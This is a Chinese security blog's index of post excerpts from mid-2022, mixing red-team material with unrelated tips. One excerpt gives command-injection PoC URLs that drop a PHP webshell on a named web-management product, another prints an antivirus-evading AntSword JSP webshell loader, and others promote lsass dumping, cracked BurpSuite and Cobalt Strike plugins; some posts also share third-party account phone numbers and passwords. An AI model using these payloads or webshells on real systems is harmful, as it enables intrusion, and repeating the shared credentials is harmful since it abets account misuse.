多种dump lsass思路和工具汇总
2022-08-02

红队技巧-绕过杀软dump-Lsass内存 Gamma实验室微信公众号https://mp.weixin.qq.com/s/QFRCMX14WJwMfM4_AEzpMg【技术分享】转储lsass的方法原理和实现学习 安全客微信公众号…

电信诈骗之论如何获取一个超过80人规模的裸聊敲诈团伙PC
2022-08-02

裸聊敲诈是目前为止从2019年开始就持续上升的一种新类型的敲诈手段,从去年圈内有一个小伙子中招开始我以为是个例,但是随着时间的发展,身边越来越多的人被敲诈,找我的都至少有三个例。这种敲诈手段比较新颖,主要有几个特点:投资少,操作简单,获利高。下面是我针对一个80多人裸聊敲诈团伙的分析拓扑图咋们再来讨论一下关于如何获取到的这80多人PC权限的。对于大规模的PC权限获取,我们不妨可以从诈骗者身上去找到,在持续性对诈骗嫌疑人监控中我们了解…

子域名收集工具(burp插件)
2022-08-01

项目地址:https://github.com/Acmesec/Sylas主动搜索设定好根域名之后,会从历史流量中抓取与根域名相关的所有子域名展示并且储存到数据库中。被动搜索当使用burp代理时,会从经过burp的流量中抓取域名进行储存。不需要开启,插件启动以及数据库连接之后就会自动拉取。相似域名模糊匹配会对相似的域名进行匹配,符合正则的…

微步个人账户查询权限提升(适合刚刚注册的0级新号 虚拟资料秒工作认证)
2022-08-01

微步个人账户查询权限提升(适合刚刚注册的0级新号 虚拟资料秒工作认证)注册官网https://x.threatbook.com/;我们这里换邮箱注册 利于跳过手机认证邮箱注册(proton)官网https://mail.proton.me/…

技战法总结
2022-08-01

很早之前的技战法了,可以在改动完善一下,不过推荐各位师傅仅供参考0day漏洞防护伪装 、异构、阻断、拦截、诱捕、排查 6步法1、伪装关键应用指纹伪装常用中间件、更改http协议header头的server字段。可将linux改为IIS6.0。修改中间件配置文件,将移动通讯app的web服务页面配置成“错误”页面返回信息。修改网关系统配置指纹,将邮件系统指纹改为“Moresec HoneyPot”,转移攻击者注意力。2、异构…

搬运几个近期poc
2022-08-01

某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waH…

分享一个企业备案查询的脚本
2022-08-01

事情是这样的,最近打了很多攻防类的演练项目,基本都是各种比赛各种卷,而目标一般会给出大批企业名称、域名或ip域名跟ip倒好说,现有的工具能支撑我从找子域到扫端口再到漏扫一条龙服务但之前好几次都在开头收集企业域名给卡住了,然后比别家慢一拍,很多报告交上去都是无效,在别人后面吃灰目前参加的比赛开始或中后期都会给出一大批只有企业名称的公共目标,数量几百或几千,而且有部分比赛的规则里目标是不包括子公司的其实github和吐司上都有几个师傅的项…

【账号共享】天眼查、爱企查账号分享
2022-08-01

最好网页登录:天眼查账号:13217436447 密码:Lsy20141109 有效期2024年03月07日爱企查账号: Liusoon97 密码:Lsy20141109 有效期:2022年09月28日

2022年HW蓝方技战法总结
2022-08-01

0day漏洞防护伪装 、异构、阻断、拦截、诱捕、排查 6步法1、伪装关键应用指纹 伪装常用中间件、更改http协议header头的server字段。可将linux改为IIS6.0。修改中间件配置文件,将移动通讯app的web服务页面配置成“错误”页面返回信息。修改网关系统配置指纹,将邮件系统指纹改为“Moresec HoneyPot”,转移攻击者注意力。2、异构边界防护设备 (增加入侵难度和成本) vpn和防火墙采用异构方式部署,同时在内外层v…

BurpSuite2022.1.1破解版
2022-07-24

BurpSuite2022.1.1版发布于2022年2月9日,属于稳定版本,此版本添加了许多用于自定义Inspector面板的外观和行为的新选项。这里建议使用java15版本进行运行https://www.oracle.com/java/tech ... hive-downloads.html链接:…

CS插件—梼杌(20220613更新)
2022-07-24

基于cobalt strike平台的红队自动化框架仅供交流与学习使用,严禁用于非法用途!taowu的script目录下所有文件均为网上搜集,不保证安全问题,请务必自主进行相关安全审查!链接: https://pan.baidu.com/s/19KnsEZ5ZOHOQ6Ya9N_gCtQ提取码: 3agn

Aria2取代浏览器内置下载器的下载设置教程【以Firefox为例】
2022-07-24

Aria2不仅可用命令行下载,也可借助图形界面前端面板下载还可通过设置Aria2取代Firefox、Chrome等浏览器内置下载器直接下载资源下面以Firefox为例介绍Aria2取代浏览器内置下载器的设置教程,Chrome等其他浏览器也可通过安装Aria2相应扩展实现。一、设置Aria2开机启动将Aria2文件夹解压到电脑磁盘任意位置点击“Boot.cmd”,在cmd界面中输入 1,按回车键,将Aria2设为开机启动点击“S…

spotify设置简体中文教程
2022-07-23

首先说一下, spotify是国外的一个音乐软件. 上面的歌曲挺全的, 电脑端体验非常好(免费, 手机端充钱体验才会好), 我认为电脑端是完爆国内的那些音乐软件的. 不过注册帐号需要科技魔法. 这边就多加赘述了.但是, 在语言设置里面, 只有繁体中文, 没有简体中文.设置如下:找到对应的位置 C:Users${yourname}AppDataRoamingSpotifyprefs(如果在这个地方没看到App…

精品短邮箱outLook邮箱,2~3位前缀,精品短邮箱申请
2022-07-22

注册教程:输入申请地址https://signup.live.com/signup.aspx?mkt=lv-lv&lic=1选择第二个选项输入你喜欢的后缀 已A66为例然后提示输入密码输入您的姓名接下来就是你的地区,生日等填写一个邮箱到手修改…

[帐号共享] 创客贴VIP账号分享
2022-07-17

如果提示账号需要验证码请及时提示我,请勿在手机app上登陆和改动账号信息。(红色字体为当前可用账户及密码)创客贴账号:13911876836 密码:jkl1129 有效期2036年10月28日创客贴不支持多处登录,强烈建议用以下步骤操作:首先用自己的账号完成设计→按图操作→登录VIP并打开连接下载[bsmessage type="common" color="teal" title="友情提醒"]请勿改动账号信息…

分享一个能过360的蚁剑jsp
2022-07-17

<%!class AFKZ extends ClassLoader{ AFKZ(ClassLoader NGOK){ super(NGOK); }public Class g(byte []b){ return super.defineClass(b,0,b.length); }}%><% String cls=request.getParameter("bypass");if(cls!=null){ new AFKZ(this.getClass().get…

分享一个自己用得云函数代码
2022-07-14

云函数端不到30行代码可匹配客户端request多种类型请求#!/usr/bin/env python # -*- coding:utf-8 -*- import requests import urllib3 urllib3.disable_warnings() def main_handler(event, context): try: args = eval(event['body']) except: return {&q…

RedGuard初探
2022-07-14

简介前几天发现自己的服务器被fofa和微步情报标记为了cobaltstrike服务器,由于以前使用的版本没有对相应的特征做修改,导致被空间搜索引擎标记,刚好看到风起在朋友圈发布了RedGuard,于是赶紧试试鲜。RedGuard由风起大佬编写的一款c2前置流量控制工具,可以帮助红队更好的隐藏c2基础设施,且目前还在更新和完善之中,在写这篇文章之后又进行了2次更新,优化和增加了一些新功能。github地址使用第一次运行会在用户…

[Python] 超星学习通作业批量下载
2022-07-14

# -*- coding: utf8 -*- #coder:nianboy #time:2022-7-14 import os import re import requests import pandas as pd class ChaoXingWork: def __init__(self, user, password): self.password = password self.user = user self.w…

分享个爆破BCrypt加密的代码
2022-07-14

分享个爆破BCrypt加密的代码,这个加密还是比较常用的 <!-- 非SpringBoot项目的依赖,SpringBoot项目也能用 --> <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-web</artifactId>…

新手瞎拍
2022-07-14

这几天一直在路上,也没时间更新,在路上拍了点照片,分享在自己的网站上。有的是我拍,有的是朋友拍。感觉有点配不上这个镜头。[bsgallery title="在路上"][bsimg title="相机镜头自拍" subtitle="自己在宾馆镜子前拍的"]https://xiaohack.…

2023考研政治教程讲义资料更新
2022-07-07

22.2023医考帮政治集训全程(44课MP4格式)21.2023喻攀政治系统班(攀喻)20.2023启航政治系统直播班(周翀 罗天)(导学和基础阶段视频和pdf文件讲义)19.2023余峰政治全程(余峰)(导学、基础班、强化班,模拟试卷,2023余峰政治选择题精选精练500题 选择题巩固模拟测试两套卷)18.2023橙啦双姐喻攀政治系统班(双姐 喻攀)17.2023海天政治高端飞跃全程(海天名师团队)(政治基础24项)16.2023曲艺政治…